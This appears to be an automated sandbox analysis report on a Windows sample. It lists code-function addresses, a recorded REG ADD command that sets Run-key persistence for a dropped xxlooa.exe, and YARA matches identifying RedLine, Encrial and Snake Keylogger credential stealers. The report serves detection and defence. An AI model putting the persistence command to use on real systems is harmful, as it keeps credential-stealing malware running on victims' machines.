Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 17_2_00402F20	17_2_00402F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 17_2_00402F89	17_2_00402F89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 17_2_00402B90	17_2_00402B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 17_2_004028B0	17_2_004028B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0108D20A	17_2_0108D20A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0108A2F0	17_2_0108A2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0108D4EA	17_2_0108D4EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 17_2_010874E0	17_2_010874E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0108C4E0	17_2_0108C4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0108D7B8	17_2_0108D7B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0108C980	17_2_0108C980
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0108586F	17_2_0108586F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0108CC58	17_2_0108CC58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0108CF30	17_2_0108CF30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01086EA8	17_2_01086EA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0108EEE0	17_2_0108EEE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01082EF8	17_2_01082EF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01084311	17_2_01084311
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0108C6A8	17_2_0108C6A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0108EED0	17_2_0108EED0
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_027D7B00	18_2_027D7B00
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_027DB9B5	18_2_027DB9B5
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_05AE26C8	18_2_05AE26C8
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_05AEA9C4	18_2_05AEA9C4
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_05AEC5A8	18_2_05AEC5A8
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_05AE26B8	18_2_05AE26B8
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_05AE2658	18_2_05AE2658
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_05FC39C0	18_2_05FC39C0
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_05FC5128	18_2_05FC5128
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_05FC5430	18_2_05FC5430
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_05FC8B88	18_2_05FC8B88
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_05FC5B31	18_2_05FC5B31
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_05FCAF20	18_2_05FCAF20
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_05FC01D8	18_2_05FC01D8
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_05FC01C9	18_2_05FC01C9
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_05FC39B0	18_2_05FC39B0
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_05FC4958	18_2_05FC4958
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_05FC7948	18_2_05FC7948
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_05FC1120	18_2_05FC1120
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_05FC5118	18_2_05FC5118
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_05FC1119	18_2_05FC1119
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_05FC3C60	18_2_05FC3C60
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_05FC5420	18_2_05FC5420
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_05FCEFD0	18_2_05FCEFD0
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_05FC5740	18_2_05FC5740
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_05FC42F0	18_2_05FC42F0
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_05FC42E3	18_2_05FC42E3
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_05FC92B8	18_2_05FC92B8
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_08619D88	18_2_08619D88
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_08612708	18_2_08612708
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_0861D5A1	18_2_0861D5A1
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_0861D5B0	18_2_0861D5B0
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_09B21BF8	18_2_09B21BF8
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_09B21180	18_2_09B21180
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_09B2FC88	18_2_09B2FC88
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_09B2FC78	18_2_09B2FC78
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_09B2F3E0	18_2_09B2F3E0
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_09B2F3D0	18_2_09B2F3D0
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_09B2E7D8	18_2_09B2E7D8
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_09B2F6D1	18_2_09B2F6D1
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_09B2FA50	18_2_09B2FA50
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_09B2FA41	18_2_09B2FA41
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_09BAE1B8	18_2_09BAE1B8
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_09BAEB8A	18_2_09BAEB8A
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_09BAFA98	18_2_09BAFA98
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_09BADA90	18_2_09BADA90
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_09BABE8A	18_2_09BABE8A
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_09BA3EE8	18_2_09BA3EE8
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_09BA2B00	18_2_09BA2B00
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_09BA2AF9	18_2_09BA2AF9
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_09BADA0E	18_2_09BADA0E
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_09BACE50	18_2_09BACE50
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_09B21BD4	18_2_09B21BD4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_0260D20A	19_2_0260D20A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_0260A2F0	19_2_0260A2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_02607630	19_2_02607630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_0260D7B8	19_2_0260D7B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_0260C4E0	19_2_0260C4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_0260D4E0	19_2_0260D4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_0260586F	19_2_0260586F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_0260C980	19_2_0260C980
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_0260EEE0	19_2_0260EEE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_02602EF8	19_2_02602EF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_02606EA8	19_2_02606EA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_0260CF30	19_2_0260CF30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_0260CC58	19_2_0260CC58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_02604311	19_2_02604311
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_0260C6A8	19_2_0260C6A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_0260EED0	19_2_0260EED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_05699398	19_2_05699398
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_05694E68	19_2_05694E68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_05699EC0	19_2_05699EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_05690D60	19_2_05690D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_05699178	19_2_05699178
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_05690D70	19_2_05690D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_0569ED49	19_2_0569ED49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_0569ED58	19_2_0569ED58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_0569E900	19_2_0569E900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_056989E0	19_2_056989E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_056919F0	19_2_056919F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_0569F5F7	19_2_0569F5F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_056919DF	19_2_056919DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_056989D0	19_2_056989D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_0569F1A0	19_2_0569F1A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_0569F1B0	19_2_0569F1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_0569E050	19_2_0569E050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_0569E03F	19_2_0569E03F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_0569E8F0	19_2_0569E8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_056920CA	19_2_056920CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_056920D8	19_2_056920D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_0569E4A8	19_2_0569E4A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_0569E49A	19_2_0569E49A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_0569D348	19_2_0569D348
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_0569D339	19_2_0569D339
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_0569DBE8	19_2_0569DBE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_0569DBF8	19_2_0569DBF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_056927C0	19_2_056927C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_0569D7A0	19_2_0569D7A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_056927BA	19_2_056927BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_0569D790	19_2_0569D790
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_0569FA60	19_2_0569FA60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_05694E62	19_2_05694E62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_05690271	19_2_05690271
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_05690273	19_2_05690273
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_0569FA52	19_2_0569FA52
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_0569F608	19_2_0569F608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_0569CEE0	19_2_0569CEE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_0569CEF0	19_2_0569CEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_05699EB0	19_2_05699EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_05690280	19_2_05690280

Source: File.com.exe, 00000000.00000002.1839360978.0000000003BC7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAubriella.exe4 vs File.com.exe
Source: File.com.exe, 00000000.00000000.1675357368.0000000000778000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSetupSfx.exe4 vs File.com.exe
Source: File.com.exe, 00000000.00000002.1839360978.0000000003CC6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAubriella.exe4 vs File.com.exe
Source: File.com.exe, 00000000.00000002.1839360978.0000000003CC6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameHPzFG9.dll" vs File.com.exe
Source: File.com.exe, 00000000.00000002.1847264743.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameHPzFG9.dll" vs File.com.exe
Source: File.com.exe, 00000000.00000002.1836393029.0000000000B6D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs File.com.exe
Source: File.com.exe	Binary or memory string: OriginalFilenameSetupSfx.exe4 vs File.com.exe

Source: File.com.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "xxlooa" /t REG_SZ /d "C:\Users\user\AppData\Roaming\xxlooa.exe"

Source: 18.2.xxlooa.exe.41e3728.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 18.2.xxlooa.exe.414a812.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 16.2.xxlooa.exe.449537a.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 18.2.xxlooa.exe.4117852.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 18.2.xxlooa.exe.41b0772.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 16.2.xxlooa.exe.43c948a.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 18.2.xxlooa.exe.41e3728.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 18.2.xxlooa.exe.4117852.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.File.com.exe.3cc6962.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.File.com.exe.3c2da42.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 16.2.xxlooa.exe.442f41a.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.File.com.exe.3bfaa72.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 17.2.AddInProcess32.exe.2b5fd6e.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.AddInProcess32.exe.2b5fd6e.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 18.2.xxlooa.exe.41b0772.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.File.com.exe.3c60a02.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 16.2.xxlooa.exe.43c948a.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.File.com.exe.3bfaa72.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.File.com.exe.3c2da42.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 16.2.xxlooa.exe.43fc45a.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 16.2.xxlooa.exe.43fc45a.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 16.2.xxlooa.exe.44c8330.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 18.2.xxlooa.exe.40e4882.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 17.2.AddInProcess32.exe.2b60c8e.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.AddInProcess32.exe.2b60c8e.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 17.2.AddInProcess32.exe.2cb0f20.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 17.2.AddInProcess32.exe.2cb0f20.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.AddInProcess32.exe.2cb0f20.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 18.2.xxlooa.exe.40e4882.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 17.2.AddInProcess32.exe.2cb0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 17.2.AddInProcess32.exe.2cb0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.AddInProcess32.exe.2cb0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 17.2.AddInProcess32.exe.2cb0000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 17.2.AddInProcess32.exe.2cb0000.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.AddInProcess32.exe.2cb0000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
